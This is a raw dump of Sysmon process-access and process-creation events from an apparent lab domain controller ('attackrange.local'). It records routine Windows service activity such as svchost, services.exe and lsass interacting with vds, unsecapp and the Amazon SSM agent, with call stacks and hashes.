13:09:44.935{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3900-000000009A01}3516C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.934{08A6967A-4298-6000-3900-000000009A01}3516C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.915{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.915{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.907{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.906{08A6967A-4286-6000-0A00-000000009A01}8441208C:\Windows\system32\services.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.853{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.853{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.552{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=DA51CF0FEA01D0A4ACD1E9A8E3EA44AA,SHA256=E86989BAC9D36028AFD6C03714261C6226DE56BE632F873E9B62330368B0D7D9,IMPHASH=F0070935B15A909B9DC00BE7997E6112{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.853{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3800-000000009A01}3396C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.806{08A6967A-4286-6000-0A00-000000009A01}8442400C:\Windows\system32\services.exe{08A6967A-4298-6000-3800-000000009A01}3396C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.790{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3800-000000009A01}3396C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.790{08A6967A-4286-6000-0A00-000000009A01}8441208C:\Windows\system32\services.exe{08A6967A-4298-6000-3800-000000009A01}3396C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.792{08A6967A-4298-6000-3800-000000009A01}3396C:\Windows\System32\vds.exe10.0.14393.2608 (rs1_release.181024-1742)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.775{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.775{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.775{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.775{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.775{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3700-000000009A01}3328C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.712{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3700-000000009A01}3328C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.712{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3700-000000009A01}3328C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.720{08A6967A-4298-6000-3700-000000009A01}3328C:\Windows\System32\vdsldr.exe10.0.14393.0 (rs1_release.160715-1616)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.697{08A6967A-4286-6000-0B00-000000009A01}8523300C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+70fae|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.681{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.681{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.634{08A6967A-4286-6000-0A00-000000009A01}8441120C:\Windows\system32\services.exe{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 